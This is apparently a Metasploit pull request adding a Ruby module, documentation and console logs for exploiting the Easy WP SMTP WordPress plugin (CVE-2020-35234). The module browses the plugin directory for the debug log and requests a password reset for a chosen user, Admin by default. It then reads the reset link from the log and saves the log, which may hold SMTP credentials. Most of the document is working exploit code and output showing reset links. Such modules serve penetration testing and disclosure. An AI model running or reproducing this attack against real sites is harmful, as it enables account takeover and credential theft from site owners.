### PR TITLE
Wordpress 2-day: easy-wp-smtp arbitrary wordpress user password reset

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md
@@ -10,6 +10,11 @@ This module will list ALL reset links, most likely the last one is the one that 
 may be value in the others as well (such as other users).  The debug log saved in loot may also contain
 the SMTP username and password.
 
+There is one potential false negative case where the `aggressive` option should be used.
+If debug mode was enabled, however only the `Test Email` was used (or no legit email has been sent by the server),
+the debug file won't exist yet.  This will be remedied by the first password reset request, but to avoid this module
+being too noisy, it won't happen unles `aggressive` is set to `true`.
+
 To summarize:
 
 1. Vulnerable version of Easy WP SMTP
@@ -39,7 +44,12 @@ To summarize:
 
 ### User
 
-The username to reset the password of
+The username to reset the password of.  Defaults to `Admin`
+
+### Aggressive
+
+When `true`, if directory listings are enabled, however debug file can not be found, the code will proceed anyways.
+Defaults to `false`.
 
 ## Scenarios
 
@@ -61,4 +71,40 @@ resource (wp_easy_wp_smtp.rb)> run
 [*] admin password reset: http://1.1.1.1/wp-login.php?action=rp&key=IdlSwWkIuy0f7k79OU2p&login=admin
 [*] Finished enumerating resets.  Last one most likely to succeed
 [*] Scanned 1 of 1 hosts (100% complete)
+```
+
+### Easy WP SMTP 1.4.1 on Wordpress 5.4.4 running on Ubuntu 20.04.  Aggressive mode
+
+```
+resource (easy-wp-smtp.rb)> use auxiliary/scanner/http/wp_easy_wp_smtp
+resource (easy-wp-smtp.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (easy-wp-smtp.rb)> set verbose true
+verbose => true
+resource (easy-wp-smtp.rb)> run
+[*] Checking /wp-content/plugins/easy-wp-smtp/readme.txt
+[*] Found version 1.4.1 in the plugin
+[+] Vulnerable version detected
+[*] Checking for debug_log file
+[-] not-vulnerable: Either debug log not turned on, or directory listings disabled.  Try Aggressive mode if false possitive
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+```
+resource (easy-wp-smtp.rb)> set aggressive true
+aggressive => true
+resource (easy-wp-smtp.rb)> run
+[*] Checking /wp-content/plugins/easy-wp-smtp/readme.txt
+[*] Found version 1.4.1 in the plugin
+[+] Vulnerable version detected
+[*] Checking for debug_log file
+[-] Debug file not found, bypassing check due to AGGRESSIVE mode
+[*] Sending password reset for Admin
+[*] Checking for debug_log file
+[+] Debug log saved to /home/h00die/.msf4/loot/20201218152659_default_1.1.1.1_5fcfd49e879f9_de_812609.txt.  Manual review for possible SMTP password, and other information.
+[*] admin password reset: http://1.1.1.1/wp-login.php?action=rp&key=SQRBS8Hpro9jPQdZ9vP5&login=admin
+[*] Finished enumerating resets.  Last one most likely to succeed
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
 ```

--- a/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md
@@ -1,0 +1,64 @@
+## Vulnerable Application
+
+Wordpress plugin Easy WP SMTP versions <= 1.4.2 was found to not include index.html within its plugin folder.
+This potentially allows for directory listings.  If debug mode is also enabled for the plugin, all SMTP
+commands are stored in a debug file.
+Combining these items, it's possible to request a password reset for an account, then view the debug file to determine
+the link that was emailed out, and reset the user's password.
+
+This module will list ALL reset links, most likely the last one is the one that will work, however there
+may be value in the others as well (such as other users).  The debug log saved in loot may also contain
+the SMTP username and password.
+
+To summarize:
+
+1. Vulnerable version of Easy WP SMTP
+1. debug turned on for Easy WP SMTP
+1. SMTP configured for Easy WP SMTP
+1. direcotry listings enabled
+
+### Install
+
+1. Install wordpress
+1. Download and install [Easy WP SMTP](https://wordpress.org/plugins/easy-wp-smtp/advanced/) <= 1.4.2
+1. Browse to Settings > Easy WP SMTP
+    1. Configure the plugin (SMTP Host, SMTP Port, UN/PASS)
+    1. Additional Settings > Enable Debug Log (Check this value, click Save Changes)
+
+## Verification Steps
+
+1. Install Wordpress, Easy WP SMTP, and configure it
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/wp_easy_wp_smtp`
+1. Do: `set rhost [ip]`
+1. Do: `set USER [username]`
+1. Do: `run`
+1. You should get the link to reset the user's password
+
+## Options
+
+### User
+
+The username to reset the password of
+
+## Scenarios
+
+### Easy WP SMTP 1.4.1 on Wordpress 5.4.4 running on Ubuntu 20.04
+
+```
+esource (wp_easy_wp_smtp.rb)> use auxiliary/scanner/http/wp_easy_wp_smtp
+resource (wp_easy_wp_smtp.rb)> set verbose true
+verbose => true
+resource (wp_easy_wp_smtp.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (wp_easy_wp_smtp.rb)> run
+[*] Checking /wp-content/plugins/easy-wp-smtp/readme.txt
+[*] Found version 1.4.1 in the plugin
+[+] Vulnerable version detected
+[+] Found debug log: /wp-content/plugins/easy-wp-smtp/5fcfd49e879f9_debug_log.txt
+[*] Sending password reset for Admin
+[+] Debug log saved to /home/h00die/.msf4/loot/20201208204705_default_1.1.1.1_5fcfd49e879f9_de_209239.txt.  Manual review for possible SMTP password, and other information.
+[*] admin password reset: http://1.1.1.1/wp-login.php?action=rp&key=IdlSwWkIuy0f7k79OU2p&login=admin
+[*] Finished enumerating resets.  Last one most likely to succeed
+[*] Scanned 1 of 1 hosts (100% complete)
+```

--- a/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md
@@ -46,7 +46,7 @@ The username to reset the password of
 ### Easy WP SMTP 1.4.1 on Wordpress 5.4.4 running on Ubuntu 20.04
 
 ```
-esource (wp_easy_wp_smtp.rb)> use auxiliary/scanner/http/wp_easy_wp_smtp
+resource (wp_easy_wp_smtp.rb)> use auxiliary/scanner/http/wp_easy_wp_smtp
 resource (wp_easy_wp_smtp.rb)> set verbose true
 verbose => true
 resource (wp_easy_wp_smtp.rb)> set rhosts 1.1.1.1

--- a/modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
+++ b/modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
@@ -1,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Easy WP SMTP',
+        'Description' => %q{
+          Wordpress plugin Easy WP SMTP versions <= 1.4.2 was found to not include index.html file within its plugin folder.
+          This potentially allows for directory listings.  If debug mode is also enabled, all SMTP commands are stored in a
+          debug file.
+          Combining these items, it's possible to send a password reset for an account, then view the debug file to determine
+          the link that was emailed out, and reset the user's account.
+        },
+        'Author' =>
+          [
+            'h00die', # msf module
+            # this was an 0day
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['URL', 'https://wordpress.org/support/topic/security-issue-with-debug-log/'],
+            ['URL', 'https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/']
+          ],
+        'DisclosureDate' => '2020-12-06'
+      )
+    )
+    register_options [
+      OptString.new('USER', [false, 'Username to reset the password for', 'Admin'])
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      fail_with Failure::NotVulnerable, 'Server not online or not detected as wordpress'
+    end
+
+    checkcode = check_plugin_version_from_readme('easy-wp-smtp', '1.4.2')
+    unless [Msf::Exploit::CheckCode::Vulnerable, Msf::Exploit::CheckCode::Appears, Msf::Exploit::CheckCode::Detected].include?(checkcode)
+      fail_with Failure::NotVulnerable, 'Easy WP SMTP'
+    end
+    print_good('Vulnerable version detected')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => "#{normalize_uri(target_uri.path, 'wp-content', 'plugins', 'easy-wp-smtp')}/"
+    })
+    fail_with Failure::Unreachable, 'Connection failed' unless res
+    unless />(?<debug_log>\w{5,15}_debug_log\.txt)/ =~ res.body
+      fail_with Failure::NotVulnerable, 'Either debug log not turned on, or directory listings disabled'
+    end
+
+    print_good("Found debug log: #{normalize_uri(target_uri.path, 'wp-content', 'plugins', 'easy-wp-smtp', debug_log)}")
+    print_status("Sending password reset for #{datastore['USER']}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
+      'vars_get' => {
+        'action' => 'lostpassword'
+      },
+      'vars_post' => {
+        'user_login' => datastore['USER'],
+        'redirect_to' => '',
+        'wp-submit' => 'Get New Password'
+      }
+    })
+    fail_with Failure::Unreachable, 'Connection failed' unless res
+    fail_with Failure::NotVulnerable, 'Site not configured to submit new password request' if res.body.include?('The email could not be sent')
+    fail_with Failure::Unknown, 'Unable to submit new password request' unless res.code == 302
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'easy-wp-smtp', debug_log)
+    })
+    store_loot(debug_log, 'text/plain', ip, res.body)
+    c2s = 'CLIENT -> SERVER:\s+'
+    res.body.scan(/#{c2s}Username: (?<username>\w+)\s+#{c2s}#{c2s}If this was a mistake, just ignore this email and nothing will happen.\s+#{c2s}#{c2s}To reset your password, visit the following address:\s+#{c2s}#{c2s}(?<link>[^\n]+)/).each do |match|
+      if datastore['USER'] == match[0]
+        print_good("#{match[0]} can be reset with #{match[1]}")
+        next
+      end
+      print_status("#{match[0]} can be reset with #{match[1]}")
+    end
+    print_status('Finished enumerating resets.  Last one most likely to succeed')
+  end
+end

--- a/modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
+++ b/modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
@@ -11,13 +11,13 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name' => 'WordPress Easy WP SMTP',
+        'Name' => 'WordPress Easy WP SMTP password reset',
         'Description' => %q{
-          Wordpress plugin Easy WP SMTP versions <= 1.4.2 was found to not include index.html file within its plugin folder.
-          This potentially allows for directory listings.  If debug mode is also enabled, all SMTP commands are stored in a
-          debug file.
-          Combining these items, it's possible to send a password reset for an account, then view the debug file to determine
-          the link that was emailed out, and reset the user's account.
+          Wordpress plugin Easy WP SMTP versions <= 1.4.2 was found to not include index.html within its plugin folder.
+          This potentially allows for directory listings.  If debug mode is also enabled for the plugin, all SMTP
+          commands are stored in a debug file.
+          Combining these items, it's possible to request a password reset for an account, then view the debug file to determine
+          the link that was emailed out, and reset the user's password.
         },
         'Author' =>
           [
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Auxiliary
         'References' =>
           [
             ['URL', 'https://wordpress.org/support/topic/security-issue-with-debug-log/'],
-            ['URL', 'https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/']
+            ['URL', 'https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/'],
+            ['URL', 'https://plugins.trac.wordpress.org/changeset/2432768/easy-wp-smtp']
           ],
         'DisclosureDate' => '2020-12-06'
       )
@@ -51,9 +52,10 @@ class MetasploitModule < Msf::Auxiliary
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => "#{normalize_uri(target_uri.path, 'wp-content', 'plugins', 'easy-wp-smtp')}/"
+      'uri' => "#{normalize_uri(target_uri.path, 'wp-content', 'plugins', 'easy-wp-smtp')}/" # trailing / to browse directory
     })
     fail_with Failure::Unreachable, 'Connection failed' unless res
+    # find the debug file name, prefix during my testing was 14 alpha-numeric
     unless />(?<debug_log>\w{5,15}_debug_log\.txt)/ =~ res.body
       fail_with Failure::NotVulnerable, 'Either debug log not turned on, or directory listings disabled'
     end
@@ -79,14 +81,16 @@ class MetasploitModule < Msf::Auxiliary
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'easy-wp-smtp', debug_log)
     })
-    store_loot(debug_log, 'text/plain', ip, res.body)
+    loot = store_loot(debug_log, 'text/plain', ip, res.body)
+    print_good("Debug log saved to #{loot}.  Manual review for possible SMTP password, and other information.")
     c2s = 'CLIENT -> SERVER:\s+'
+    # this is an ugly regex, but the username, and link span multiple lines
     res.body.scan(/#{c2s}Username: (?<username>\w+)\s+#{c2s}#{c2s}If this was a mistake, just ignore this email and nothing will happen.\s+#{c2s}#{c2s}To reset your password, visit the following address:\s+#{c2s}#{c2s}(?<link>[^\n]+)/).each do |match|
       if datastore['USER'] == match[0]
-        print_good("#{match[0]} can be reset with #{match[1]}")
+        print_good("#{match[0]} password reset: #{match[1]}")
         next
       end
-      print_status("#{match[0]} can be reset with #{match[1]}")
+      print_status("#{match[0]} password reset: #{match[1]}")
     end
     print_status('Finished enumerating resets.  Last one most likely to succeed')
   end

--- a/modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
+++ b/modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Auxiliary
             ['URL', 'https://wordpress.org/support/topic/security-issue-with-debug-log/'],
             ['URL', 'https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/'],
             ['URL', 'https://plugins.trac.wordpress.org/changeset/2432768/easy-wp-smtp'],
-            ['WPVDB', '10494']
+            ['WPVDB', '10494'],
+            ['CVE', '2020-35234']
           ],
         'DisclosureDate' => '2020-12-06'
       )


### PR DESCRIPTION
This PR adds a 2-day old exploit for Wordpress plugin Easy WP SMTP that was found to be exploited in the wild.  It's a neat one, but lots of things need to go right.

1. vulnerable plugin installed
1. plugin needs to have `debug` turned on
1. plugin's smtp settings need to work (server/port/login)
1. directory indexing turned on for the web server (my default ubuntu w/ apache had this).

At that point, we're able to see a dir list for the plugin folder, to see the randomly prefixed debug log file.  This file has ALL SMTP activity recorded in it.  We then request a password reset for a user.  Read the debug log file, we'll be able to see the link for the user.  At that point someone can follow the link and successfully reset the user's password.  The log file may also contain creds for the SMTP connection, however since you're most likely taking over the admin account, and can then go read them in plaintext, no need to parse them out.

```
resource (wp_easy_wp_smtp.rb)> use auxiliary/scanner/http/wp_easy_wp_smtp
resource (wp_easy_wp_smtp.rb)> set verbose true
verbose => true
resource (wp_easy_wp_smtp.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (wp_easy_wp_smtp.rb)> run
[*] Checking /wp-content/plugins/easy-wp-smtp/readme.txt
[*] Found version 1.4.1 in the plugin
[+] Vulnerable version detected
[+] Found debug log: /wp-content/plugins/easy-wp-smtp/5fcfd49e879f9_debug_log.txt
[*] Sending password reset for Admin
[+] Debug log saved to /home/h00die/.msf4/loot/20201208204705_default_1.1.1.1_5fcfd49e879f9_de_209239.txt.  Manual review for possible SMTP password, and other information.
[*] admin password reset: http://1.1.1.1/wp-login.php?action=rp&key=IdlSwWkIuy0f7k79OU2p&login=admin
[*] Finished enumerating resets.  Last one most likely to succeed
[*] Scanned 1 of 1 hosts (100% complete)
```